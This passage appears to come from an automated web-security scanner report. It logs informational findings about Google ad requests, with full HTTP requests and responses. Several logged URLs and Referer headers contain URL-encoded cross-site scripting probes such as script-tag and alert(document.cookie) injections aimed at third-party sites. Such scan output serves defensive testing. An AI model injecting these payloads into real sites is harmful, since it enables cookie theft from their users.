P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:32 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 14009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#000055;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.abbreviations.com/bs.aspx%253Fst%253Db1.aspx51536%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253E7a00ceef170%2526SE%253D3%2526r%253D1%26hl%3Den%26client%3Dca-pub-6071864913982699%26adU%3Dwww.google.com/webdesigner%26adT%3DAre%2BYou%2BA%2BWeb%2BDesigner%253F%26adU%3DEventsManager.GFI.Com%26adT%3DGFI%2BEventsManager%25E2%2584%25A2%2B2010%26adU%3Dwww.elance.com/Javascript%26adT%3DJavascript%2Bprogrammer%26adU%3Dwww.SeeWhy.com/%26adT%3DShopping%2BCart%2BAbandons%26gl%3DUS&amp;usg=AFQjCNEoZD3S-6NohErZ7QpCcI2ZGdeADA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.44. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990848&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969248591&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969248617&frm=0&adk=1607234649&ga_vid=1801418532.1295969249&ga_sid=1295969249&ga_hid=807060559&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=36815001&fu=0&ifi=1&dtd=101&xpc=TfA2DY7uwP&p=file%3A//
The response contains the following link to another domain:
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNGDLGwHNUQr8N6UNbXK1BiPOiZ7mA

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1295990848&flash=10.1.103&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fhtml%2Fbmwusa.com-xss-cwe-79.html&dt=1295969248591&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295969248617&frm=0&adk=1607234649&ga_vid=1801418532.1295969249&ga_sid=1295969249&ga_hid=807060559&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1155&bih=1012&eid=36815001&fu=0&ifi=1&dtd=101&xpc=TfA2DY7uwP&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 15:27:27 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 3922

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<font style="line-height:8px; font-size:9px" face="arial,sans-serif" color="#000000"><a target="_blank" href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/examples/html/bmwusa.com-xss-cwe-79.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DClickability.com/CMS%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGDLGwHNUQr8N6UNbXK1BiPOiZ7mA">Ads by Google</a>
...[SNIP]...

20.45. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922057432&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922057502&frm=1&adk=1195544698&ga_vid=1700750743.1295922058&ga_sid=1295922058&ga_hid=1241591129&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&fu=0&ifi=1&dtd=75
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922057432&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922057502&frm=1&adk=1195544698&ga_vid=1700750743.1295922058&ga_sid=1295922058&ga_hid=1241591129&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&fu=0&ifi=1&dtd=75 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:20:56 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4798

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw">
...[SNIP]...
AIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtwPJzSJfjhlpvGyEX4GGmUF2T3QwQ%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CNGEtKvRyrO0GRDYBRhaMgiEUxXKuYpkHw" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBNcwuhzM-TcfNOoGCmgetj9HuBpuxle4B2-WvlxqLh8qyUZDmdRABGAEgoYyRAjgAUPe51-P-_____wFgyYajh9SjgBCgAcn29-4DsgEOd3d3LmJlaXJ1dC5jb226AQk3Mjh4OTBfYXPIAQTaAXBodHRwOi8vd3d3LmJlaXJ1dC5jb20vY3NzL2JsdWUvNDQyOWUlMjUyNyUyNTNiYWxlcnQlMjUyOGRvY3VtZW50LmNvb2tpZSUyNTI5JTI1MmYlMjUyZjU5ZjhjNzE4NWM1L3NlYXJjaC1idG4uZ2lm-AEBgAIBuAIYwAIByAKb7PYSqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtwPJzSJfjhlpvGyEX4GGmUF2T3QwQ%26client%3Dca-pub-3737471162188127%26adurl%3Dhttp://www.Zoosk.com/d/dating2/35/%253Ffrom%253DAW_D3_WW_EX_US_www.beirut.com" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.46. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027186&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885027175&frm=0&adk=2318622855&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=3&xpc=2EoxxgUwVL&p=http%3A//www25.big.jp
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNH5WHj1nhGm9gE-C16VIqi6pxmdHg

Request

GET /pagead/ads?client=ca-pub-2719533347097950&output=html&h=90&slotname=0093365503&w=728&lmt=1295906627&flash=10.1.103&url=http%3A%2F%2Fwww25.big.jp%2F~jamfe517%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ec6ee4a3cfa8%2Fleafnode%2B%2F&dt=1295885027186&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=6395072094&correlator=1295885027175&frm=0&adk=2318622855&ga_vid=1307658933.1295885027&ga_sid=1295885027&ga_hid=744425852&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=950&bih=1012&eid=30143102&ref=http%3A%2F%2Fburp%2Fshow%2F9&fu=0&ifi=2&dtd=3&xpc=2EoxxgUwVL&p=http%3A//www25.big.jp HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www25.big.jp/~jamfe517%3Cscript%3Ealert(document.cookie)%3C/script%3Ec6ee4a3cfa8/leafnode+/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 22:00:15 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4820

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g">
...[SNIP]...
ah71F6Zv26tJ04fDi7_EOjveA%26client%3Dca-pub-2719533347097950%26adurl%3Dhttp://network.adsmarket.com/click/jGltmI2cgpiJapiVjZuplY9icpxgoqmdjmhxxGCbfJuNkGqVY6R7nQ%253Fdp%253D!!!1935290!!!-MarioV2103260"><EMBED src="http://pagead2.googlesyndication.com/pagead/imgad?id=CKvR0IblhuirURDYBRhaMgi7ObV7Sj7g2g" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="clickTAG=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB-Yc3b_Y9Tba3HpeVmgeAw8nSBvDCgf8B6LSjvB3AjbcBkE4QARgBIKLxsQc4AFDvz7uM-P____8BYMmGo4fUo4AQoAGQqqnbA7IBDHd3dzI1LmJpZy5qcLoBCTcyOHg5MF9hc8gBBNoBYmh0dHA6Ly93d3cyNS5iaWcuanAvfmphbWZlNTE3JTNDc2NyaXB0JTNFYWxlcnQoZG9jdW1lbnQuY29va2llKSUzQy9zY3JpcHQlM0VjNmVlNGEzY2ZhOC9sZWFmbm9kZSsv4AECuAIYyAKogN8WqAMB9QMAAADE%26num%3D1%26sig%3DAGiWqtyIzah71F6Zv26tJ04fDi7_EOjveA%26client%3Dca-pub-2719533347097950%26adurl%3Dhttp://network.adsmarket.com/click/jGltmI2cgpiJapiVjZuplY9icpxgoqmdjmhxxGCbfJuNkGqVY6R7nQ%253Fdp%253D!!!1935290!!!-MarioV2103260" TYPE="application/x-shockwave-flash" AllowScriptAccess="never" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www25.big.jp/~jamfe517%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ec6ee4a3cfa8/leafnode%252B/%26hl%3Dja%26client%3Dca-pub-2719533347097950%26adU%3Dmightymagoo.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH5WHj1nhGm9gE-C16VIqi6pxmdHg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-ja-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

20.47. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com
The response contains the following links to other domains:
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png
  • http://pagead2.googlesyndication.com/pagead/sma8.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.ics.com%26adT%3DICS:%2BExpert%2BQt%2BConsulting%26adU%3DOpManager.ManageEngine.com%26adT%3DNetwork%2BManagement%2BSystem%26adU%3Dwww.Appro.com%26adT%3DLinux%2BClusters%26gl%3DUS&usg=AFQjCNEzDgvlH8k5AmRc-JjarKhyGvfj_g

Request

GET /pagead/ads?client=ca-pub-8731857490252326&output=html&h=90&slotname=0094017143&w=728&lmt=1295902498&flash=10.1.103&url=http%3A%2F%2Flinux.maruhn.com%2Fsec%2Faub.html&dt=1295880898475&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=0094017143&correlator=1295880898400&frm=0&adk=1662659689&ga_vid=1851423893.1295880898&ga_sid=1295880898&ga_hid=1753839581&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=934&bih=1012&fu=0&ifi=2&dtd=16&xpc=hchF3t9VxU&p=http%3A//linux.maruhn.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://linux.maruhn.com/sec/aub.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 24 Jan 2011 14:54:23 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 12021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://linux.maruhn.com/sec/aub.html%26hl%3Den%26client%3Dca-pub-8731857490252326%26adU%3Dwww.ics.com%26adT%3DICS:%2BExpert%2BQt%2BConsulting%26adU%3DOpManager.ManageEngine.com%26adT%3DNetwork%2BManagement%2BSystem%26adU%3Dwww.Appro.com%26adT%3DLinux%2BClusters%26gl%3DUS&amp;usg=AFQjCNEzDgvlH8k5AmRc-JjarKhyGvfj_g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

20.48. http://googleads.g.doubleclick.net/pagead/ads

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:
  • http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041997&frm=1&adk=1195544698&ga_vid=1051291716.1295922042&ga_sid=1295922042&ga_hid=160895596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&eid=36815001%2C30143102&fu=0&ifi=1&dtd=292
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
  • http://pagead2.googlesyndication.com/pagead/images/i.png
  • http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g
  • http://pagead2.googlesyndication.com/pagead/js/abg.js
  • http://pagead2.googlesyndication.com/pagead/js/graphics.js
  • http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.beirut.com/css/blue/4429e%25252527%2525253balert%25252528document.cookie%25252529%2525252f%2525252f59f8c7185c5/search-btn.gif%26hl%3Den%26client%3Dca-pub-3737471162188127%26adU%3Dwww.Zoosk.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNEcR4W7AaXrB-LbFajaNyMj8Vc60Q

Request

GET /pagead/ads?client=ca-pub-3737471162188127&output=html&h=90&slotname=1039915113&w=728&ea=0&flash=10.1.103&url=http%3A%2F%2Fwww.beirut.com%2Fcss%2Fblue%2F4429e%252527%25253balert%252528document.cookie%252529%25252f%25252f59f8c7185c5%2Fsearch-btn.gif&dt=1295922041953&shv=r20101117&jsv=r20110120&saldr=1&correlator=1295922041997&frm=1&adk=1195544698&ga_vid=1051291716.1295922042&ga_sid=1295922042&ga_hid=160895596&ga_fc=0&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=2249656148&eid=36815001%2C30143102&fu=0&ifi=1&dtd=292 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d1.openx.org/afr.php?n=a8c465c4&zoneid=121958&target=_blank&cb=2116188280
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Tue, 25 Jan 2011 02:20:41 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Content-Length: 4798

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(a){window.sta
...[SNIP]...
<div id="google_flash_div" style="position:absolute;left:0px;z-index:1001"><OBJECT classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="google_flash_obj" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" WIDTH="728" HEIGHT="90"><PARAM NAME=movie VALUE="http://pagead2.googlesyndication.com/pagead/imgad?id=CI7-pqDm2Pq7IxDYBRhaMghF7q9hat1k7g">
...[SNIP]...
